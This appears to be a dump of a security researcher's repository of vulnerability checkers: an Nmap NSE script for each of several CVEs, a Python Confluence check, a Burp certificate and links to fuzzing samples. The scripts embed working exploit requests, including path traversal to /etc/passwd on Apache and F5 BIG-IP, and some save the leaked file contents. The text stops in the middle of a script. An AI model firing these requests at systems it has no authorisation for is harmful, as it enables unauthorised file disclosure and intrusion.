WebFrameworkSecurityScanner.new(ARGV[0] || '.') 106 | scanner.scan 107 | end 108 | -------------------------------------------------------------------------------- /bfd-raw-auth-sha1.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/bfd-raw-auth-sha1.pcap -------------------------------------------------------------------------------- /bfd-raw-auth-simple.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/bfd-raw-auth-simple.pcap -------------------------------------------------------------------------------- /burp.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDyTCCArGgAwIBAgIEVI/xfDANBgkqhkiG9w0BAQsFADCBijEUMBIGA1UEBhML 3 | UG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0 4 | U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2ln 5 | Z2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNDEyMTYwODQ2NTJa 6 | Fw0zODEyMTYwODQ2NTJaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UE 7 | CBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQ 8 | b3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBv 9 | cnRTd2lnZ2VyIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApsfc 10 | ju9v6Zo9FLEHJZX2vtWboRVEywA/2sV3hTAsdZy4N76b4twDcmEgzJyOc07sUyT0 11 | 9pBZ8xaLBwWSIVeaKKH6KWfb+eJ0dqaPu5m3L9/ikCOYUV5cIjkR8q0fyzO1ltNC 12 | 4prrniNFYmRQEi9J8bB8BGfkaay0KOjAyjyLwk51+2VXoUp1FYXY3tlIEXlJNFUK 13 | yl9rDvWastNLCbXebc+NaGe+g73WSTyuTec5trY8zMZ/wPLJfe0UrEqqhPb1OTKI 14 | hpNJBxs3BT++0mLfU1PAhyRN500q3bmmtpEJEleNqFN5LcJCqts9jOXIGzruy1OP 15 | dFIdkXnW7wwJNMZG9QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1Ud 16 | DgQWBBSu2KIppj5JO9kQDFRuLhsfaVTTHDANBgkqhkiG9w0BAQsFAAOCAQEAKBiq 17 | AXVqxeCLd2nz2XXPrOpefFeovcrQXC75LylNdzshejYGWiLkm3llPh1eKax/RzTA 18 | Qakfh2mMy/RQnphJ/Gp4CfBJgUfXANIDItkS9osorTuJxy8b6nDYFQScIiqyS2Mp 19 | 0tOOJu8fuyU+7mV4+jBh/jinPXOulSbERM85U6kYZvXvPaDxlCCsvhdm9AguDXYG 20 | dFki4KqRsYowUUBKxvAXRjpC9elJTmYJz2WaB1PdCnU6afLcCUFrhNj+r+3o0R+/ 21 | hmfSwzHk5B8VXNtHWfwonoPhbVa0D/rtoMLZznFsVaGAOI20DbiOs9+qWZwniW4U 22 | c8vm+CpBnNFCcWdvVg== 23 | -----END CERTIFICATE----- 24 | -------------------------------------------------------------------------------- /check_cve_2023_22518.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | import string 4 | import argparse 5 | import urllib3 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | def random_string(length=10): 10 | letters = string.ascii_lowercase 11 | return ''.join(random.choice(letters) for i in range(length)) 12 | 13 | def post_setup_restore(url): 14 | url = f"{url.rstrip('/')}/json/setup-restore.action" 15 | 16 | headers = { 17 | "X-Atlassian-Token": "no-check", 18 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7" 19 | } 20 | 21 | rand_str = random_string() 22 | data = ( 23 | "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n" 24 | "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n" 25 | "true\r\n" 26 | "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n" 27 | f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n" 28 | f"{rand_str}\r\n" 29 | "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n" 30 | "Content-Disposition: form-data; name=\"edit\"\r\n\r\n" 31 | "Upload and import\r\n" 32 | "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n" 33 | ) 34 | 35 | try: 36 | response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False) 37 | 38 | if (response.status_code == 200 and 39 | 'The zip file did not contain an entry' in response.text and 40 | 'exportDescriptor.properties' in response.text): 41 | print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!") 42 | else: 43 | print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.") 44 | except requests.RequestException as e: 45 | print(f"[*] Error connecting to {url}. Error: {e}") 46 | 47 | def main(): 48 | parser = argparse.ArgumentParser(description="Post setup restore script") 49 | parser.add_argument('--url', help='The URL to target', required=False) 50 | parser.add_argument('--file', help='Filename containing a list of URLs', required=False) 51 | args = parser.parse_args() 52 | 53 | if args.url: 54 | post_setup_restore(args.url) 55 | elif args.file: 56 | with open(args.file, 'r') as f: 57 | for line in f: 58 | url = line.strip() 59 | if url: 60 | post_setup_restore(url) 61 | else: 62 | print("You must provide either --url or --file argument.") 63 | 64 | if __name__ == "__main__": 65 | main() 66 | 67 | # Ref - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-22518.yaml 68 | -------------------------------------------------------------------------------- /crash.vim.txt: -------------------------------------------------------------------------------- 1 | ٝٝٝٝٝٝٝٝٝٝٝ 2 | -------------------------------------------------------------------------------- /file0014.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/file0014.pdf -------------------------------------------------------------------------------- /file0019.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/file0019.pdf -------------------------------------------------------------------------------- /firefoxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/firefoxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.lnk -------------------------------------------------------------------------------- /get_fun.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | def extract_functions(file_content): 4 | 5 | function_pattern = re.compile(r'^\s*\w+\s+\*?(\w+)\s*\([^)]*\)\s*\{', re.MULTILINE) 6 | 7 | matches = function_pattern.findall(file_content) 8 | return matches 9 | 10 | file_path = 'path_to_your_source_file.c' # File path goes here 11 | with open(file_path, 'r') as file: 12 | content = file.read() 13 | 14 | function_list = extract_functions(content) 15 | for function in function_list: 16 | print(f'fun: {function}') 17 | -------------------------------------------------------------------------------- /gpac_fuzz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/gpac_fuzz -------------------------------------------------------------------------------- /http-vuln-cve-2021-41773.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local shortport = require "shortport" 4 | local table = require "table" 5 | local string = require "string" 6 | local vulns = require "vulns" 7 | local nmap = require "nmap" 8 | local io = require "io" 9 | 10 | description = [[ 11 | This NSE script checks whether the target server is vulnerable to CVE-2021-41773 12 | ]] 13 | --- 14 | -- @usage 15 | -- nmap --script http-vuln-cve2021-41773 -p 16 | -- nmap --script http-vuln-cve2021-41773 -p --script-args output='file.txt' 17 | -- @output 18 | -- PORT STATE SERVICE 19 | -- 443/tcp open http 20 | -- | CVE-2021-41773: 21 | -- | Host is vulnerable to CVE-2021-41773 22 | -- @changelog 23 | -- 05-10-2021 - Discovery: Ash Daulton 24 | -- 05-10-2021 - Author: Dhiraj Mishra (@RandomDhiraj) --[[ NMAP Script--]] 25 | -- 05-10-2021 - Exploit Reference: --[[https://twitter.com/ptswarm/status/1445376079548624899--]] 26 | -- @xmloutput 27 | -- 28 | -- Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 29 | -- VULNERABLE 30 | --
31 | -- A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. 32 | --
33 | -- 34 | --
35 | -- 2021 36 | -- 05 37 | -- 10 38 | --
39 | -- 40 | -- 05-10-2021 41 | -- 42 | --
43 | -- 44 | -- https://httpd.apache.org/security/vulnerabilities_24.html 45 | -- https://lists.apache.org/thread.html/r6abf5f2ba6f1aa8b1030f95367aaf17660c4e4c78cb2338aee18982f@%3Cusers.httpd.apache.org%3E 46 | --
47 | -- 48 | 49 | Discovery = "Ash Daulton" 50 | author = "Dhiraj Mishra (@RandomDhiraj)" --[[ NMAP Script--]] 51 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 52 | categories = {"discovery", "intrusive","vuln"} 53 | 54 | portrule = shortport.ssl 55 | 56 | action = function(host,port) 57 | local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil 58 | local vuln = { 59 | title = 'Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49', 60 | state = vulns.STATE.NOT_VULN, 61 | description = [[ 62 | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. 63 | ]], 64 | references = { 65 | 'https://httpd.apache.org/security/vulnerabilities_24.html', 66 | 'https://nvd.nist.gov/vuln/detail/CVE-2021-41773', 67 | }, 68 | dates = { 69 | disclosure = {year = '2021', month = '10', day = '05'}, 70 | }, 71 | } 72 | local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) 73 | local path = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 74 | local response 75 | local output = {} 76 | local success = "Host is vulnerable to CVE-2021-41773" 77 | local fail = "Host is not vulnerable" 78 | local match = 'root:x:0:0:root' 79 | local credentials 80 | local TMUI 81 | 82 | response = http.get(host, port.number, path) 83 | 84 | if not response.status then 85 | stdnse.print_debug("Request Failed") 86 | return 87 | end 88 | if response.status == 200 then 89 | if string.match(response.body, match) then 90 | stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path) 91 | vuln.state = vulns.STATE.VULN 92 | TMUI = (("Verify arbitrary file read: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path)) 93 | 94 | if outputFile then 95 | credentials = response.body:gsub('%W','.') 96 | vuln.check_results = stdnse.format_output(true, TMUI) 97 | vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file") 98 | file = io.open(outputFile, "a") 99 | file:write(credentials, "\n") 100 | else 101 | vuln.check_results = stdnse.format_output(true, TMUI) 102 | end 103 | end 104 | elseif response.status == 403 then 105 | stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status) 106 | vuln.state = vulns.STATE.NOT_VULN 107 | end 108 | 109 | return vuln_report:make_output(vuln) 110 | end 111 | -------------------------------------------------------------------------------- /http-vuln-cve2020-3452.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local shortport = require "shortport" 4 | local table = require "table" 5 | local string = require "string" 6 | local vulns = require "vulns" 7 | local nmap = require "nmap" 8 | local io = require "io" 9 | 10 | description = [[ 11 | This NSE script checks whether the target server is vulnerable to CVE-2020-3452 12 | ]] 13 | --- 14 | -- @usage 15 | -- nmap --script http-vuln-cve2020-3452 -p 16 | -- nmap --script http-vuln-cve2020-3452 -p --script-args output='file.txt' 17 | -- @output 18 | -- PORT STATE SERVICE 19 | -- 443/tcp open http 20 | -- | CVE-2020-3452: 21 | -- | Host is vulnerable to CVE-2020-3452 22 | -- @changelog 23 | -- 01-07-2020 - Discovery: Mikhail Klyuchnikov & Ahmed Aboul-Ela 24 | -- 05-07-2020 - Author: Dhiraj Mishra --[[ NMAP Script--]] 25 | -- @xmloutput 26 | -- 27 | -- Cisco Adaptive Security Appliance and FTD Unauthorized Remote File Reading 28 | -- VULNERABLE 29 | --
30 | -- A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. 31 | --
32 | -- 33 | --
34 | -- 2020 35 | -- 22 36 | -- 07 37 | --
38 | -- 39 | -- 01-07-2020 40 | -- 41 | --
42 | -- 43 | -- https://nvd.nist.gov/vuln/detail/CVE-2020-3452 44 | -- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 45 | --
46 | -- 47 | 48 | author = "Dhiraj Mishra (@RandomDhiraj)" --[[ NMAP Script--]] 49 | Discovery = "Mikhail Klyuchnikov & Ahmed Aboul-Ela" 50 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 51 | categories = {"discovery", "intrusive","vuln"} 52 | 53 | portrule = shortport.ssl 54 | 55 | action = function(host,port) 56 | local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil 57 | local vuln = { 58 | title = 'CISCO ASA/FTD Read-Only Path Traversal Vulnerability', 59 | state = vulns.STATE.NOT_VULN, 60 | description = [[ 61 | A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. 62 | ]], 63 | references = { 64 | 'https://nvd.nist.gov/vuln/detail/CVE-2020-3452', 65 | 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86', 66 | }, 67 | dates = { 68 | disclosure = {year = '2020', month = '07', day = '22'}, 69 | }, 70 | } 71 | local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) 72 | local path = "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" 73 | local response 74 | local output = {} 75 | local success = "Host is vulnerable to CVE-2020-3452" 76 | local fail = "Host is not vulnerable" 77 | local match = 'INTERNAL_PASSWORD_ENABLED' 78 | local credentials 79 | local CASA 80 | 81 | response = http.get(host, port.number, path) 82 | 83 | if not response.status then 84 | stdnse.print_debug("Request Failed") 85 | return 86 | end 87 | if response.status == 200 then 88 | if string.match(response.body, match) then 89 | stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path) 90 | vuln.state = vulns.STATE.VULN 91 | CASA = (("Verify arbitrary file read: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path)) 92 | 93 | if outputFile then 94 | credentials = response.body:gsub('%W','.') 95 | vuln.check_results = stdnse.format_output(true, CASA) 96 | vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file") 97 | file = io.open(outputFile, "a") 98 | file:write(credentials, "\n") 99 | else 100 | vuln.check_results = stdnse.format_output(true, CASA) 101 | end 102 | end 103 | elseif response.status == 403 then 104 | stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status) 105 | vuln.state = vulns.STATE.NOT_VULN 106 | end 107 | 108 | return vuln_report:make_output(vuln) 109 | end 110 | -------------------------------------------------------------------------------- /http-vuln-cve2020-5902.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local shortport = require "shortport" 4 | local table = require "table" 5 | local string = require "string" 6 | local vulns = require "vulns" 7 | local nmap = require "nmap" 8 | local io = require "io" 9 | 10 | description = [[ 11 | This NSE script checks whether the target server is vulnerable to CVE-2020-5902 12 | ]] 13 | --- 14 | -- @usage 15 | -- nmap --script http-vuln-cve2020-5902 -p 16 | -- nmap --script http-vuln-cve2020-5902 -p --script-args output='file.txt' 17 | -- @output 18 | -- PORT STATE SERVICE 19 | -- 443/tcp open http 20 | -- | CVE-2020-5902: 21 | -- | Host is vulnerable to CVE-2020-5902 22 | -- @changelog 23 | -- 01-07-2020 - Discovery: Mikhail Klyuchnikov (@__Mn1__) 24 | -- 05-07-2020 - Author: Dhiraj Mishra (@RandomDhiraj) --[[ NMAP Script--]] 25 | -- 05-07-2020 - Exploit Reference: Budi Khoirudin (@x4ce) --[[https://twitter.com/x4ce/status/1279790599793545216--]] 26 | -- @xmloutput 27 | -- 28 | -- BIG-IP TMUI RCE Vulnerability 29 | -- VULNERABLE 30 | --
31 | -- In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. 32 | --
33 | -- 34 | --
35 | -- 2020 36 | -- 01 37 | -- 07 38 | --
39 | -- 40 | -- 01-07-2020 41 | -- 42 | --
43 | -- 44 | -- https://support.f5.com/csp/article/K52145254 45 | -- https://nvd.nist.gov/vuln/detail/CVE-2020-5902 46 | --
47 | -- 48 | 49 | author = "Dhiraj Mishra (@RandomDhiraj)" --[[ NMAP Script--]] 50 | Discovery = "Mikhail Klyuchnikov (@__Mn1__)" 51 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 52 | categories = {"discovery", "intrusive","vuln"} 53 | 54 | portrule = shortport.ssl 55 | 56 | action = function(host,port) 57 | local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil 58 | local vuln = { 59 | title = 'BIG-IP TMUI RCE Vulnerability', 60 | state = vulns.STATE.NOT_VULN, 61 | description = [[ 62 | In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. 63 | ]], 64 | references = { 65 | 'https://support.f5.com/csp/article/K52145254', 66 | 'https://nvd.nist.gov/vuln/detail/CVE-2020-5902', 67 | }, 68 | dates = { 69 | disclosure = {year = '2020', month = '07', day = '01'}, 70 | }, 71 | } 72 | local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) 73 | local path = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" 74 | local response 75 | local output = {} 76 | local success = "Host is vulnerable to CVE-2020-5902" 77 | local fail = "Host is not vulnerable" 78 | local match = 'root:x:0:0:root' 79 | local credentials 80 | local TMUI 81 | 82 | response = http.get(host, port.number, path) 83 | 84 | if not response.status then 85 | stdnse.print_debug("Request Failed") 86 | return 87 | end 88 | if response.status == 200 then 89 | if string.match(response.body, match) then 90 | stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path) 91 | vuln.state = vulns.STATE.VULN 92 | TMUI = (("Verify arbitrary file read: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path)) 93 | 94 | if outputFile then 95 | credentials = response.body:gsub('%W','.') 96 | vuln.check_results = stdnse.format_output(true, TMUI) 97 | vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file") 98 | file = io.open(outputFile, "a") 99 | file:write(credentials, "\n") 100 | else 101 | vuln.check_results = stdnse.format_output(true, TMUI) 102 | end 103 | end 104 | elseif response.status == 403 then 105 | stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status) 106 | vuln.state = vulns.STATE.NOT_VULN 107 | end 108 | 109 | return vuln_report:make_output(vuln) 110 | end 111 | -------------------------------------------------------------------------------- /http-vuln-cve2023-3519.nse: -------------------------------------------------------------------------------- 1 | -- Usage: nmap --script cve-2023-3519-checker 2 | -- Nmap NSE script for CVE-2023-3519 Citrix unauthenticated remote code execution 3 | -- Inspried from https://github.com/telekom-security/cve-2023-3519-citrix-scanner 4 | 5 | 6 | description = [[ 7 | Checks target for CVE-2023-3519 vulnerability. 8 | ]] 9 | 10 | author = "Dhiraj Mishra (@RandomDhiraj)" 11 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 12 | categories = {"safe", "vuln"} 13 | 14 | references = { 15 | 'https://nvd.nist.gov/vuln/detail/CVE-2023-3519', 16 | 'https://twitter.com/DTCERT/status/1682032701430452233' 17 | } 18 | 19 | description = [[ 20 | Checks target for CVE-2023-3519 vulnerability. 21 | Compares "Last-Modified" header in the server response to known patched versions. 22 | ]] 23 | 24 | categories = {"safe", "vuln"} 25 | 26 | local http = require "http" 27 | local shortport = require "shortport" 28 | local strbuf = require "strbuf" 29 | 30 | portrule = shortport.ssl 31 | 32 | local PATCHED_VERSIONS = { 33 | "Fri, 07 Jul 2023 15:39:40 GMT", 34 | "Mon, 10 Jul 2023 17:41:17 GMT", 35 | "Mon, 10 Jul 2023 18:36:14 GMT" 36 | } 37 | 38 | function checkversion(last_modified) 39 | for _, patch in ipairs(PATCHED_VERSIONS) do 40 | if last_modified == patch then 41 | return "Patched version detected" 42 | end 43 | end 44 | return "Potentially vulnerable (Older than 01 Jul 2023)" 45 | end 46 | 47 | action = function(host, port) 48 | local response 49 | local patched = "Not verifiable" 50 | local last_modified 51 | 52 | response = http.get(host, port, "/") 53 | 54 | if response.status == 200 then 55 | last_modified = response.header["last-modified"] 56 | 57 | if last_modified then 58 | patched = checkversion(last_modified) 59 | else 60 | last_modified = "N/A" 61 | end 62 | 63 | return ("IP: %s | Last Modified Header: %s | Result: %s\n"):format(host.ip, last_modified, patched) 64 | else 65 | return ("IP: %s | Unable to retrieve response\n"):format(host.ip) 66 | end 67 | end 68 | -------------------------------------------------------------------------------- /http-vuln-cve2023-46805_2024_21887.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local shortport = require "shortport" 4 | local string = require "string" 5 | local vulns = require "vulns" 6 | 7 | description = [[ 8 | This NSE script checks Ivanti Pulse Secure SSL VPN CVE-2023-46805 & CVE-2024-21887. 9 | ]] 10 | --- 11 | -- @usage 12 | -- nmap --script http-vuln-cve2023-46805_2024_21887 -p 13 | -- nmap --script http-vuln-cve2023-46805_2024_21887 -p --script-args http.host= 14 | -- 15 | -- @output 16 | -- PORT STATE SERVICE 17 | -- 443/tcp open http 18 | -- | http-vuln-cve2023-46805_2024_21887: 19 | -- | Host is vulnerable to CVE-2023-46805 & CVE-2024-21887 "PulsePitfall". 20 | -- 21 | 22 | author = "Dhiraj Mishra (@RandomDhiraj)" 23 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 24 | categories = {"vuln"} 25 | 26 | portrule = shortport.portnumber(443) 27 | 28 | action = function(host, port) 29 | local vuln = { 30 | title = 'Pulse Secure Connect "PulsePitfall" CVE-2023-46805 & CVE-2024-21887', 31 | state = vulns.STATE.NOT_VULN, 32 | description = [[ 33 | The host retruns with an empty "403" response likely to be vulnerable with CVE-2023-46805 and CVE-2024-21887 Command Injection and Authentication Bypass in Ivanti Connect Secure and Ivanti Policy Secure. 34 | ]], 35 | references = { 36 | 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/', 37 | 'https://nvd.nist.gov/vuln/detail/CVE-2023-46805', 38 | 'https://nvd.nist.gov/vuln/detail/CVE-2024-21887', 39 | }, 40 | } 41 | local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) 42 | 43 | local response = http.get(host, port, "/api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark") 44 | if response.status == 403 and string.len(response.body) == 0 then 45 | stdnse.print_debug("%s: %s GET - 403 Forbidden without content - potentially vulnerable", SCRIPT_NAME, host.targetname or host.ip) 46 | vuln.state = vulns.STATE.VULN 47 | else 48 | stdnse.print_debug("%s: The host does not appear to be vulnerable.", SCRIPT_NAME) 49 | end 50 | 51 | return vuln_report:make_output(vuln) 52 | end 53 | -------------------------------------------------------------------------------- /http-vuln-cve2023-49103.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local shortport = require "shortport" 4 | local string = require "string" 5 | local vulns = require "vulns" 6 | 7 | description = [[ 8 | This NSE script checks for ownCloud - Phpinfo Configuration Vulnerability (CVE-2023-49103). 9 | ]] 10 | --- 11 | -- @usage 12 | -- nmap --script http-vuln-cve2023-49103 -p 13 | -- nmap --script http-vuln-cve2023-49103 -p --script-args http.host= 14 | -- 15 | -- @output 16 | -- PORT STATE SERVICE 17 | -- 443/tcp open http 18 | -- | http-vuln-cve2023-49103: 19 | -- | Host is vulnerable to CVE-2023-49103 20 | -- 21 | 22 | author = "Dhiraj Mishra (@RandomDhiraj)" 23 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 24 | categories = {"vuln"} 25 | 26 | portrule = shortport.portnumber(443) 27 | 28 | action = function(host, port) 29 | local vuln = { 30 | title = 'ownCloud - Phpinfo Configuration Vulnerability (CVE-2023-49103)', 31 | state = vulns.STATE.NOT_VULN, 32 | description = [[ 33 | An issue was discovered in ownCloud where the graphapi app exposes sensitive information through a Phpinfo configuration file. 34 | ]], 35 | references = { 36 | 'https://nvd.nist.gov/vuln/detail/CVE-2023-49103', 37 | }, 38 | } 39 | local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) 40 | local paths = { 41 | "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/input.css", 42 | "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/zero.css" 43 | } 44 | local response 45 | local vulnerable = false 46 | 47 | for _, path in ipairs(paths) do 48 | response = http.get(host, port, path) 49 | if response.status == 200 and 50 | string.find(response.body, "PHP Extension") and 51 | string.find(response.body, "PHP Version") and 52 | string.find(response.body, "owncloud") then 53 | stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME, host.targetname or host.ip, path) 54 | vuln.state = vulns.STATE.VULN 55 | vulnerable = true 56 | break 57 | end 58 | end 59 | 60 | if not vulnerable then 61 | stdnse.print_debug("%s: The host does not appear to be vulnerable.", SCRIPT_NAME) 62 | end 63 | 64 | return vuln_report:make_output(vuln) 65 | end 66 | -------------------------------------------------------------------------------- /http-vuln-cve2024-0012.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local string = require "string" 5 | local vulns = require "vulns" 6 | 7 | description = [[ 8 | Tests for Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability (CVE-2024-0012). 9 | An authentication bypass enables an unauthenticated attacker with network access to the management web interface 10 | to gain PAN-OS administrator privileges. 11 | 12 | The script attempts to bypass authentication by sending specific HTTP headers and accessing a specially crafted path. 13 | If successful, it indicates the target is vulnerable to authentication bypass. 14 | 15 | References: 16 | * https://nvd.nist.gov/vuln/detail/CVE-2024-0012 17 | * https://security.paloaltonetworks.com/CVE-2024-0012 18 | * https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ 19 | ]] 20 | 21 | -- @usage 22 | -- nmap -p --script panos-cve-2024-0012 23 | -- nmap -sV --script panos-cve-2024-0012 24 | -- 25 | -- @output 26 | -- PORT STATE SERVICE 27 | -- 443/tcp open https 28 | -- | panos-cve-2024-0012: 29 | -- | VULNERABLE: 30 | -- | Palo Alto Networks PAN-OS Authentication Bypass 31 | -- | State: VULNERABLE 32 | -- | Description: 33 | -- | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated 34 | -- | attacker with network access to the management web interface to gain PAN-OS administrator privileges. 35 | -- | Disclosure date: 2024-11-19 36 | -- | Extra information: 37 | -- | Target is vulnerable to CVE-2024-0012. Authentication bypass successful. 38 | -- | Session cookie obtained: PHPSESSID=abc123def456ghi 39 | -- | References: 40 | -- | https://security.paloaltonetworks.com/CVE-2024-0012 41 | -- |_ https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ 42 | 43 | author = "Dhiraj Mishra (@RandomDhiraj)" 44 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 45 | categories = {"vuln", 